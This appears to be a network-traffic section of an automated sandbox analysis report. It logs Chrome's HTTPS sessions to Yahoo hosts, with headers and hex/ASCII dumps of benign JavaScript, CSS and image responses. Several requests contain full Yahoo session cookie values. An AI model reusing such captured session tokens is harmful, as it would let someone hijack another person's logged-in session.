                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ctorEncoder,e[r.Fields.publisherLegitimateInterests]=s.FixedVectorEncoder,e[r.Fields.numCustomPurposes]=c.IntEncoder,e[r.Fields.publisherCustomConsents]=s.FixedVectorEncoder,e[r.Fields.publisherCustomLegitimateInterests]=s.FixedVectorEncoder,e}},2692:func


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              43192.168.2.45106387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC1069OUTGET /info/p.gif?apptype=default&beaconType=pageRenderStart&code=pageRender&bucket=rocket_GA_desk_test-3-v1%2Cseamless&device=desktop&intl=us&rid=1fkbtbdjgb12s&site=fp&t=1728414813100 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC589INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_beaconeater.media.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              44192.168.2.45106587.248.119.2524431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC847OUTGET /ybar/cerebro_min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: edge-mcdn.secure.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: VaffBHmpaxteC22eC4uLdMYS6143lsyHOmLnM/rVlqmUzf4Xi3tVXp7T21iYdKLFz6sXAKEgdQs=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 6Q0D2JAYQE6Y79QX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 23:19:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 05 May 2022 20:34:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 5636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "0ccb51bc1dd6980920da39e008a599e0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 71635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 76 61 72 20 57 4f 52 4b 5f 53 45 52 56 45 52 3d 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 2d 6d 63 64 6e 2e 73 65 63 75 72 65 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 79 62 61 72 2f 65 78 70 2e 6a 73 6f 6e 22 2c 54 49 4d 45 4f 55 54 3d 32 65 33 2c 43 65 72 65 62 72 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 75 70 6c 6f 61 64 54 79 70 65 3d 22 69 6e 64 69 76 69 64 75 61 6c 22 2c 74 68 69 73 2e 65 78 70 43 6f 75 6e 74 3d 30 2c 74 68 69 73 2e 70 65 6e 64 69 6e 67 3d 7b 7d 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 3d 30 7d 72 65 74 75 72 6e 20 65 2e 72 75 6e 45 78 70 65 72 69 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6e 65 77 20 65 29 2e 5f 66 65 74 63 68 57 6f 72 6b 28 29 7d 2c 65 2e 73 65 6e 64 42 65 61 63 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: var WORK_SERVER="https://edge-mcdn.secure.yahoo.com/ybar/exp.json",TIMEOUT=2e3,Cerebro=function(){function e(){this.uploadType="individual",this.expCount=0,this.pending={},this.complete=0}return e.runExperiment=function(){(new e)._fetchWork()},e.sendBeaco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 69 73 20 30 22 29 3b 65 6c 73 65 7b 69 66 28 6e 3e 3d 65 2e 65 78 70 4c 69 73 74 2e 6c 65 6e 67 74 68 29 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 6d 61 72 6b 65 64 20 61 6c 6c 20 65 78 70 65 72 69 6d 65 6e 74 73 20 74 6f 20 72 75 6e 20 61 73 20 65 78 70 43 6f 75 6e 74 20 3e 3d 20 65 78 70 4c 69 73 74 20 6c 65 6e 67 74 68 22 29 2c 72 3d 65 2e 65 78 70 4c 69 73 74 3b 65 6c 73 65 20 69 66 28 22 72 61 6e 64 6f 6d 22 3d 3d 3d 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 6d 61 72 6b 65 64 20 22 2b 6e 2b 22 20 72 61 6e 64 6f 6d 20 65 78 70 65 72 69 6d 65 6e 74 73 20 74 6f 20 72 75 6e 22 29 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 3b 69 2b 2b 29 7b 76 61 72 20 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 65 2e 65 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: is 0");else{if(n>=e.expList.length)console.log("marked all experiments to run as expCount >= expList length"),r=e.expList;else if("random"===t){console.log("marked "+n+" random experiments to run");for(var i=0;i<n;i++){var s=Math.floor(Math.random()*(e.ex
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 65 61 63 6f 6e 73 22 29 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 6e 64 42 65 61 63 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6d 3d 74 68 69 73 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 61 72 74 54 69 6d 65 3d 30 2c 74 68 69 73 2e 65 6e 64 54 69 6d 65 3d 30 2c 74 68 69 73 2e 73 6f 75 72 63 65 3d 22 64 65 66 61 75 6c 74 22 7d 2c 74 3d 30 2c 6f 3d 65 3b 74 3c 6f 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6f 5b 74 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 69 2c 73 2c 6f 2c 61 2c 75 2c 63 29 7b 76 61 72 20 6c 2c 70 2c 64 2c 66 2c 68 3b 30 3c 61 2e 6c 65 6e 67 74 68 7c 7c 30 3c 6f 2e 6c 65 6e 67 74 68 3f 28 70 3d 6e 65 77 20 6e 2c 64 3d 21 31 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eacons")}},e.prototype._sendBeacons=function(e){for(var m=this,n=function(){this.startTime=0,this.endTime=0,this.source="default"},t=0,o=e;t<o.length;t++){var r=o[t];!function(r,i,s,o,a,u,c){var l,p,d,f,h;0<a.length||0<o.length?(p=new n,d=!1,new Promise(f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 2c 66 7c 7c 65 28 29 7d 2c 68 2e 73 74 61 72 74 54 69 6d 65 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6f 2e 73 72 63 3d 72 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 7b 68 2e 65 6e 64 54 69 6d 65 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 68 2e 73 6f 75 72 63 65 3d 22 69 6d 61 67 65 22 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 72 29 3b 6d 2e 65 78 70 43 6f 75 6e 74 3d 31 3c 65 2e 6c 65 6e 67 74 68 3f 6d 2e 65 78 70 43 6f 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: clearTimeout(t),f||e()},h.startTime=Date.now(),o.src=r}).then(function(){if("performance"in window&&"getEntriesByType"in window.performance){h.endTime=Date.now(),h.source="image";var e=window.performance.getEntriesByName(r);m.expCount=1<e.length?m.expCoun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC436INData Raw: 22 2c 6c 3d 5b 5d 2c 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 2b 3d 65 2e 72 65 70 6c 61 63 65 28 22 3c 42 45 41 43 4f 4e 3e 22 2c 6e 29 2c 6c 2e 70 75 73 68 28 65 2e 72 65 70 6c 61 63 65 28 22 3c 42 45 41 43 4f 4e 3e 22 2c 6e 29 29 7d 29 2c 22 67 72 6f 75 70 22 3d 3d 74 68 69 73 2e 75 70 6c 6f 61 64 54 79 70 65 3f 28 63 20 69 6e 20 74 68 69 73 2e 70 65 6e 64 69 6e 67 7c 7c 28 74 68 69 73 2e 70 65 6e 64 69 6e 67 5b 63 5d 3d 5b 5d 29 2c 74 68 69 73 2e 70 65 6e 64 69 6e 67 5b 63 5d 2e 70 75 73 68 28 5b 75 2c 6c 5d 29 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 2b 2b 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 3d 3d 74 68 69 73 2e 65 78 70 43 6f 75 6e 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 70 65 6e 64 69 6e 67 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ",l=[],i.forEach(function(e){c+=e.replace("<BEACON>",n),l.push(e.replace("<BEACON>",n))}),"group"==this.uploadType?(c in this.pending||(this.pending[c]=[]),this.pending[c].push([u,l]),this.complete++,this.complete==this.expCount&&Object.keys(this.pending)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              45192.168.2.45106687.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC611OUTGET /pv/static/ms/trendingNow-flameIcon.yhome-variable.a2368adb8251677d29ac1399a6f34c43.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC710INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: Rcohz43KeQ9u4ER62iOE0nTPqEWIYfWCvFykoWREA/tB6nVAHC9DFDuEO3F2E2OGNB/hy/2YQIu6Yg4Osn/l1ytedCzLoi5zDKZUw1+ab1A=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: T57F1MNEW4SPGBA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 06 Oct 2024 10:19:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 28 Mar 2023 10:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "da05f5d596c887a6a5221011fa70d158"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 1610
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 204829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 3a 72 6f 6f 74 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 5b 64 61 74 61 2d 6d 61 69 6e 74 61 69 6e 2d 63 6f 6c 6f 72 5d 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2d 2d 73 72 63 68 2d 74 6e 2d 66 6c 61 6d 65 2d 63 6f 6c 6f 72 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 2d 36 33 2e 39 34 64 65 67 2c 20 23 31 44 32 32 32 38 20 30 25 2c 20 23 31 44 32 32 32 38 20 31 36 2e 31 25 2c 20 23 42 32 33 39 30 39 20 31 36 2e 31 25 2c 20 23 42 32 33 39 30 39 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 34 38 2e 32 25 2c 20 23 31 44 32 32 32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :root,html[data-color-scheme=dark] [data-maintain-color],html[data-color-theme-enabled][data-color-scheme=light]{--srch-tn-flame-color:linear-gradient(-63.94deg, #1D2228 0%, #1D2228 16.1%, #B23909 16.1%, #B23909 32.2%, #FF520D 32.2%, #FF520D 48.2%, #1D222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC310INData Raw: 39 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 33 32 2e 32 25 2c 20 23 46 46 35 32 30 44 20 34 38 2e 32 25 2c 20 23 31 44 32 32 32 38 20 34 38 2e 32 25 2c 20 23 31 44 32 32 32 38 20 36 37 2e 38 25 2c 20 23 42 32 33 39 30 39 20 36 37 2e 38 25 2c 20 23 42 32 33 39 30 39 20 38 33 2e 39 25 2c 20 23 46 46 35 32 30 44 20 38 33 2e 39 25 29 3b 2d 2d 73 72 63 68 2d 74 6e 2d 66 6c 61 6d 65 2d 69 63 6f 6e 3a 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 70 76 2f 73 74 61 74 69 63 2f 69 6d 67 2f 69 63 6f 6e 2d 66 6c 61 6d 65 2d 6c 69 67 68 74 2d 32 30 32 33 30 33 30 31 30 33 35 32 2e 67 69 66 27 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 72 63 68 54 6e 54 65 78 74 41 6e 69 6d 74 69 6f 6e 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 9 32.2%, #FF520D 32.2%, #FF520D 48.2%, #1D2228 48.2%, #1D2228 67.8%, #B23909 67.8%, #B23909 83.9%, #FF520D 83.9%);--srch-tn-flame-icon:url('https://s.yimg.com/pv/static/img/icon-flame-light-202303010352.gif')}}@keyframes srchTnTextAnimtion{0%{background-p


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              46192.168.2.45106787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:34 UTC763OUTGET /uu/api/res/1.2/tXAWAMh378MREDEIQWaIbQ--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/857b5ce0-855a-11ef-bdd7-52ddf2ff99a3.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="857b5ce0-855a-11ef-bdd7-52ddf2ff99a3.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "be311fc49c017fde715939bf1ff7a6e1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 09:54:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 10:00:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
